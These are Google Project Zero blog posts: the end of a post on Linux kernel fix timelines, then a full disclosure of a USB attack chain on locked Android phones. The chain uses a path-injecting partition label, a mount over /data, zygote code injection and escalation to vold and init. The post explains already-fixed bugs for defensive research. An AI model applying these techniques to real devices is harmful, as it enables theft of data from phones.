In this case, the backport to the upstream-supported stable kernels 4.18, 4.14, 4.9 and 4.4 were published 2018-09-19, five days after the patch became public, at which point the distributions could pull in the patch.
Upstream stable kernel updates are published very frequently. For example, looking at the last few stable releases for the 4.14 stable kernel, which is the newest upstream longterm maintenance release:
4.14.72 on 2018-09-264.14.71 on 2018-09-194.14.70 on 2018-09-154.14.69 on 2018-09-094.14.68 on 2018-09-054.14.67 on 2018-08-244.14.66 on 2018-08-22
The 4.9 and 4.4 longterm maintenance kernels are updated similarly frequently; only the 3.16 longterm maintenance kernel has not received any updates between the most recent update on 2018-09-25 (3.16.58) and the previous one on 2018-06-16 (3.16.57).
However, Linux distributions often don't publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly.
In this case, the security issue was announced on the oss-security mailing list on 2018-09-18, with a CVE allocation on 2018-09-19, making the need to ship new distribution kernels to users clearer. Still: As of 2018-09-26, both Debian and Ubuntu (in releases 16.04 and 18.04) track the bug as unfixed:
https://security-tracker.debian.org/tracker/CVE-2018-17182https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-17182.html
Fedora pushed an update to users on 2018-09-22: https://bugzilla.redhat.com/show_bug.cgi?id=1631206#c8ConclusionThis exploit shows how much impact the kernel configuration can have on how easy it is to write an exploit for a kernel bug. While simply turning on every security-related kernel configuration option is probably a bad idea, some of them - like the kernel.dmesg_restrict sysctl - seem to provide a reasonable tradeoff when enabled.
The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime.
Categories: Security

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

Mon, 09/10/2018 - 12:18
Posted by Jann Horn, Google Project Zero
Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).
After an Android phone has been unlocked once on boot (on newer devices, using the "Unlock for all features and data" screen; on older devices, using the "To start Android, enter your password" screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)
The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 ("directory traversal over USB via injection in blkid output")https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 ("privesc zygote->init; chain from USB")
These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).The attack surfaceMany Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn't necessarily complete):
  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel's filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold (one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.
The bug (part 1): Determining partition attributesWhen a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.
To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:
/dev/block/sda1: LABEL="<label>" UUID="<uuid>" TYPE="<type>"
However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid's output only scanned for the first occurrences of UUID=" and TYPE=". Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.The bug (part 2): Mounting the filesystemWhen vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel's vfat filesystem implementation should be able to mount, PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:
   if (mFsType != "vfat") {        LOG(ERROR) << getId() << " unsupported filesystem " << mFsType;        return -EIO;    }    if (vfat::Check(mDevPath)) {        LOG(ERROR) << getId() << " failed filesystem check";        return -EIO;    }    // Use UUID as stable name, if available    std::string stableName = getId();    if (!mFsUuid.empty()) {        stableName = mFsUuid;    }    mRawPath = StringPrintf("/mnt/media_rw/%s", stableName.c_str());    [...]    if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {        PLOG(ERROR) << getId() << " failed to create mount points";        return -errno;    }    if (vfat::Mount(mDevPath, mRawPath, false, false, false,            AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {        PLOG(ERROR) << getId() << " failed to mount " << mDevPath;        return -EIO;    }
The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.
This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is 'UUID="../##' into a locked phone, the phone will mount that USB stick to /mnt/##.
However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:
  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes 'UUID="' to start the injection, which leaves only five characters for the directory traversal - insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mounton permission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won't be permitted to actually interact with the filesystem - for example, the zygote and system_server aren't allowed to do so. On top of that, processes that don't have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section "Dealing with SELinux: Triggering the bug twice" describes how these restrictions can be avoided in the context of this specific bug.
Exploitation: Chameleonic USB mass storageAs described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you'd then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn't require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time, blkid also performs some sanity checks on superblocks, the PoC takes a different route.
After blkid has read parts of the filesystem and used them to determine the filesystem's type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.
A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.
This is relatively simple to implement in practice thanks to Linux' built-in support for device-side USB. Andrzej Pietrasiewicz's talk "Make your own USB gadget" is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.
The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn't add unwanted caching.
At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string 'UUID="../../data'), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.
However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.Dealing with SELinux: Triggering the bug twiceThe major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.
vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at /data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.
As an attacker, it normally shouldn't be possible to mount an ext4 filesystem this way because phones aren't usually set up with any such keys; and even if there is such a key, you'd still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn't entirely correct - actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)
Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.
In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem - including mapping them with PROT_EXEC.Injecting into zygoteThe zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.
When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable /system partition; only the art file is actually stored on /data. But we can instead make system@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with __attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.
The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.Crashing the systemThis part is a bit unpleasant.
When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the "Unlock for all features and data" prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running "ls /sdcard" on the device.
This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.
Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn't immediately fall over - while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.After some experimentation, it turned out that Android's code for tracking bandwidth usage has a safety check: If the network usage tracking code can't write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.
To create a network connection, there are two options:
  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn't work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you'd probably want to use an ethernet connection.
At this point, we can run arbitrary native code in zygote context and access user data; but we can't yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would've been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we'll have to escalate our privileges a bit more.From zygote to voldEven though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMIN capability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting the NO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:
  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 - which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn't work if the root filesystem is a rootfs filesystem. This is the technique used here.

In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers /system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux label u:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):
https://android.googlesource.com/platform/system/sepolicy/+/master/private/domain.te#1:domain_auto_trans(domain, crash_dump_exec, crash_dump);
At the time this bug was reported, the crash_dump domain had the following SELinux policy:
https://android.googlesource.com/platform/system/sepolicy/+/a3b3bdbb2fdbb4c540ef4e6c3ba77f5723ccf46d/public/crash_dump.te:[...]allow crash_dump {  domain  -init  -crash_dump  -keystore  -logd}:process { ptrace signal sigchld sigstop sigkill };[...]r_dir_file(crash_dump, domain)[...]
This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take over vold.
Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, and crash_dump can't use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code into crash_dump64, it still wouldn't be able to leverage that to attack system components because of the UID mismatch.
If you've been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn't work because vold - very sensibly - hardcodes the MS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).
To inject code into crash_dump64, we can create a new mount namespace with unshare() (using our CAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers of crash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.
At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android's security policy considers us to have kernel-equivalent privileges; however, to see what you'd have to do from here to gain code execution in the kernel, this blogpost goes a bit further.From vold to init contextIt doesn't look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:
https://android.googlesource.com/platform/system/sepolicy/+/master/private/kernel.te:domain_auto_trans(kernel, init_exec, init)
This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn't mounted with MS_NOSUID, then our file will be executed in init context.
The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called "usermode helpers" that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, ...) to userspace code. In particular, when a nonexistent key is looked up (e.g. via request_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.
Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then call request_key(), and the kernel invokes our request-key in init context.
The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.From init context to the kernelFrom init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):
domain_trans(init, { rootfs toolbox_exec }, modprobe)domain_trans(init, vendor_toolbox_exec, vendor_modprobe)
modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:
allow modprobe self:capability sys_module;allow modprobe { system_file }:system module_load;allow vendor_modprobe self:capability sys_module;allow vendor_modprobe { vendor_file }:system module_load;
Android nowadays doesn't require signatures for kernel modules:
walleye:/ # zcat /proc/config.gz | grep MODULECONFIG_MODULES_USE_ELF_RELA=yCONFIG_MODULES=y# CONFIG_MODULE_FORCE_LOAD is not setCONFIG_MODULE_UNLOAD=yCONFIG_MODULE_FORCE_UNLOAD=yCONFIG_MODULE_SRCVERSION_ALL=y# CONFIG_MODULE_SIG is not set# CONFIG_MODULE_COMPRESS is not setCONFIG_MODULES_TREE_LOOKUP=yCONFIG_ARM64_MODULE_CMODEL_LARGE=yCONFIG_ARM64_MODULE_PLTS=yCONFIG_RANDOMIZE_MODULE_REGION_FULL=yCONFIG_DEBUG_SET_MODULE_RONX=y
Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.Lessons learnedNotably, this attack crosses two weakly-enforced security boundaries: The boundary from blkid_untrusted to vold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote's CAP_SYS_ADMIN capability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn't, a security boundary - but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use - for example, as a development aid while stronger isolation is in development -, but they can also have negative effects by obfuscating how important a component is for the security of the overall system.
In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.
Categories: Security